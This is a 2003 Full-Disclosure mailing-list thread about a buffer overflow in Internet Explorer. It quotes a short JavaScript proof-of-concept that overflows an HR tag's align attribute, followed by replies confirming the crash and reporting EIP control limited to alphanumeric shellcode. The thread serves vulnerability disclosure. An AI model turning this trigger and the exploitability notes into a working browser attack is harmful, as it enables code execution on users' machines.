[Full-Disclosure] Re: Internet Explorer >=5.0 : Buffer overflow

From: SecurITeam BugTraq Monitoring (bugtraq_at_securiteam.com)
Date: 06/25/03

    To: "KF" <dotslash@snosoft.com>, "Digital Scream" <digitalscream@real.xakep.ru>
    Date: Wed, 25 Jun 2003 13:05:20 +0200
    
    

    Hi,

    I can confirm it under Windows 2000 with IE 5.50.4807.2300

    Full control over the EIP, but the shellcode cannot contain (as it currently
    appears) non-alphanumeric characters, too bad I guess.

    Thanks
    Noam Rathaus
    CTO
    Beyond Security Ltd
    http://www.SecurITeam.com
    http://www.BeyondSecurity.com
    ----- Original Message -----
    From: "KF" <dotslash@snosoft.com>
    To: "Digital Scream" <digitalscream@real.xakep.ru>
    Sent: Monday, June 23, 2003 6:43 PM
    Subject: Re: Internet Explorer >=5.0 : Buffer overflow

    > I can confirm this on Windows XP Professional
    >
    > version 6.0.2800.1106.xpsp2-030422-1633
    >
    > 0x43534c41 referenced mem at 0x43534c41
    > -KF
    >
    >
    > Digital Scream wrote:
    >
    > ><script>
    > > wnd=open("about:blank","","");
    > > wnd.moveTo(screen.Width,screen.Height);
    > > WndDoc=wnd.document;
    > > WndDoc.open();
    > > WndDoc.clear();
    > > buffer="";
    > > for(i=1;i<=127;i++)buffer+="X";
    > > buffer+="DigitalScream";
    > > WndDoc.write("<HR align='"+buffer+"'>");
    > > WndDoc.execCommand("SelectAll");
    > > WndDoc.execCommand("Copy");
    > > wnd.close();
    > ></script>
    > >
    > >Grtz: Nj3l, buggzy, 3APA3A, Void Team, X - Crew
    > >
    > >
    > >
    >
    >
    >

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

